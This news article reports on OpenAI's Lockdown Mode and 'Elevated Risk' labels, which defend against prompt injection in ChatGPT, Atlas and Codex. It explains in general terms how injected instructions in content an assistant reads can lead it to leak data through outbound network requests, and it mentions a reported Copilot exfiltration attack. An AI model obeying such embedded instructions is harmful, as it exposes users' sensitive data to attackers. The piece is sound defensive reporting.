OpenAI adds Lockdown Mode and “Elevated Risk” labels

OpenAI has introduced Lockdown Mode, an optional security setting in ChatGPT that tightens how the product can interact with external systems. The company also added “Elevated Risk” labels to flag a small set of capabilities in ChatGPT, ChatGPT Atlas, and Codex that may introduce additional security risk.^[1][2]

The changes target prompt injection, a class of attacks where malicious instructions are embedded in content a model reads in an effort to make it reveal sensitive data or take unintended actions.

Context and background

Prompt injection has become a higher-stakes problem as AI assistants move beyond chat and into workflows that include browsing, connected apps, and automated actions. OpenAI says the security stakes change when models can interact with the web and external tools.^[1]

Outside OpenAI, the UK’s NCSC has warned prompt injection may never be fully mitigated in the same way as SQL injection, and that defenses should focus on reducing risk and impact; industry frameworks such as OWASP also treat it as a top concern.^[3][4]

Key details

Lockdown Mode: a deterministic security setting

OpenAI describes Lockdown Mode as an advanced setting for a small group of “highly security-conscious users,” such as executives and security teams, and says it is not necessary for most users.^[1]

On its Help Center page, OpenAI says Lockdown Mode “locks down many tools and capabilities” to prevent them from accessing the network. OpenAI says the goal is strong deterministic protection against prompt injection-based data exfiltration, with the trade-off that features are disabled or limited.^[2]

It lists specific capabilities that are disabled in Lockdown Mode, including:

• Live web browsing (limited to cached content)

• Images in ChatGPT responses (users can still upload images and use image generation)

• Deep Research (disabled)

• Agent Mode (disabled)

• Canvas networking approvals (users cannot approve Canvas-generated code to access the network)

• File downloads for data analysis (ChatGPT cannot download files, but can work on manually uploaded files)

OpenAI says browsing in Lockdown Mode is limited to cached content so no live network requests leave its controlled network. It says some features are disabled when it cannot provide strong deterministic guarantees.^[1]

What Lockdown Mode is designed to do, and what it does not do

Lockdown Mode is positioned as an impact-reduction measure. OpenAI says the configuration is designed to block the “final stage” of prompt injection driven data exfiltration by deterministically preventing outbound network requests that could transfer sensitive data to an attacker.^[2]

It’s important to note that Lockdown Mode does not deterministically prevent prompt injections from reaching the model’s context. A malicious prompt could still be present in content the model reads, but Lockdown Mode aims to reduce the risk that such injections can transmit data outward.^[2]

OpenAI also says Lockdown Mode does not affect memory, file uploads, or conversation sharing, and notes that many of these can be configured independently by workspace admins.^[2]

Apps and connectors: not disabled, but meant to be tightly controlled

OpenAI says apps and connectors can interact with the internet and therefore carry potential exfiltration risk. Instead of disabling apps outright, OpenAI recommends admins configure which apps, and which actions within those apps, are available to users in Lockdown Mode.^[2]

The Help Center provides risk guidance, treating write actions as generally riskier than read actions because they can create observable side effects. It recommends limiting enabled actions to the minimum needed, and avoiding untrusted apps and certain write actions for high-risk users.^[2]

Availability and admin controls

OpenAI says Lockdown Mode is available for ChatGPT Enterprise, ChatGPT Edu, ChatGPT for Healthcare, and ChatGPT for Teachers. Workspace admins can enable it by creating a role in Workspace Settings and assigning users to that role.^[1][2]

OpenAI points admins to its Compliance API Logs Platform as a separate mechanism to provide visibility into app usage, shared data, and connected sources.^[1][2]

OpenAI says it plans to make Lockdown Mode available to consumers “in the coming months.” [1] The Help Center adds that it is not yet available on Plus, Pro, Free, or Teams, and that OpenAI plans to expand to consumer and Team plans in the coming months.^[2]

“Elevated Risk” labels across ChatGPT, Atlas, and Codex

OpenAI says it is standardizing “Elevated Risk” labels for a short list of existing capabilities across ChatGPT, ChatGPT Atlas, and Codex. The labels are meant to provide consistent in-product guidance when a feature introduces additional risk, particularly network-related capabilities.^[1]

OpenAI’s example is Codex network access, where developers can allow Codex to take actions on the web and see an “Elevated Risk” warning in settings.^[1]

The Help Center also states that Lockdown Mode does not affect network access in Codex.

Why this change, and why now?

The core issue is that prompt injection becomes more operationally dangerous when assistants can browse, call tools, or interact with connected systems. Microsoft’s MSRC has described “indirect prompt injection” as malicious instructions embedded in content a system reads, and argues for defense in depth that combines multiple layers of mitigations rather than relying on any single safeguard.^[5]

The UK’s NCSC has also warned that comparing prompt injection to SQL injection is “dangerous,” arguing that prompt injection should be approached by reducing risk and impact rather than assuming it can be fully mitigated.^[3]

Recent research and incident reporting in adjacent enterprise assistants has reinforced the same risk pattern. Varonis described a “single-click” Microsoft Copilot attack, called Reprompt, aimed at data exfiltration. Microsoft has since patched the issue, according to reporting.^[6]

OpenAI’s rollout pairs product restrictions with clearer warnings. Lockdown Mode narrows or removes high-risk pathways for users at highest risk, while “Elevated Risk” labels aim to make the security trade-offs more visible when users enable network-related capabilities.^[1][2]

Why this matters

For organizations, Lockdown Mode is a signal that certain AI features now sit in the security domain. When assistants can connect to the web and apps, the problem shifts from unsafe output to controlling which actions and data flows are possible in the first place.^[1][2]

For individual users, the change is likely to make risk more visible. The “Elevated Risk” labels are meant to warn users when they enable network-related capabilities that can introduce new exposure.^[1]

Brief outlook

OpenAI says it will remove “Elevated Risk” labels once security advances sufficiently mitigate the risks for general use, and that the set of labeled features may change over time. The company has not listed which features will be added or removed next.

OpenAI says Lockdown Mode will reach consumer and Team plans “in the coming months,” but it has not provided dates or rollout detail.^[2]